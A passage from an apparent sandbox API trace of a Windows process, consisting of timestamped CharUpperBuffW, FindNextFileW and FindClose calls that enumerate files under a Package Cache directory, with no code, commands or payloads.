cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.444] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.444] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.445] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.445] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.445] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.445] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.445] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.445] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.445] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.445] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.448] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.448] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.448] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.448] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.448] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.448] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.449] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.449] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.449] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.449] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.449] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.449] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.450] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.450] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.450] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.450] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.450] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.450] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.451] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.451] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.451] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.451] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.677] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.677] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.677] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.677] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.677] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.677] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0110.677] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.677] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.677] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0110.677] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.926] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.926] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.926] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.926] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0110.926] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.926] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.926] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0110.926] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0110.927] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0110.927] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0110.927] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.927] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.927] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0110.927] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.928] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0110.928] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.928] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.929] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.929] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0110.929] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.929] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0110.930] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.930] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0110.930] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0110.930] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.931] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.931] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0110.931] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.931] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.972] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.995] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.995] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.995] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.016] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.017] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.024] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.025] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.025] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.026] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.034] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.034] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.036] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.036] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.036] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.036] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.037] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.037] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.037] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.037] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.037] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.037] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.037] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.037] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.037] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.037] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.038] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.038] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.038] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.038] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.038] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.055] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.055] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.056] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.056] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.056] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.056] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.056] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.056] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.057] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.057] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.057] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.057] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0111.057] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0111.057] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0111.057] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.057] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.058] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.058] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.058] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.058] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.058] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.058] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.059] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0111.059] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0111.059] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.059] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.059] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.059] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.059] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.059] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.060] FindClose (in: hFindFile=0x1c8068 | out: hFindFile=0x1c8068) returned 1 [0111.060] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0111.060] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0111.060] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0111.060] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0111.060] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0111.060] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0111.061] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0111.061] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.061] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.061] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.061] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0111.061] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.061] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.061] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.062] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.062] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.062] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.062] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.062] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.066] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.066] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0111.066] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.066] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.066] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.066] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.068] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.069] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.069] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.069] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.070] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.070] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.070] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.070] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.070] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.070] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.098] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.099] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.207] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.208] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.208] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.208] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.208] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.208] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.209] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.209] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.209] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.209] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.209] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.209] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.209] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.209] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.210] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.210] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.211] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.211] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.211] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.211] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.211] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.211] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.211] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.211] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.211] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.211] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.212] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.212] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.212] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.212] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.212] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.212] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.212] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.212] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.212] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.212] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.212] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.212] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.213] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.213] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.213] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.213] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.213] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.213] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.214] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.214] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.214] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.214] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0111.214] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0111.214] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0111.214] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.214] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.214] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.214] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.214] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.214] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.214] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.214] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.215] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.215] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.215] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.215] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.215] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.215] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.215] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.215] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.215] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.215] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.216] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: 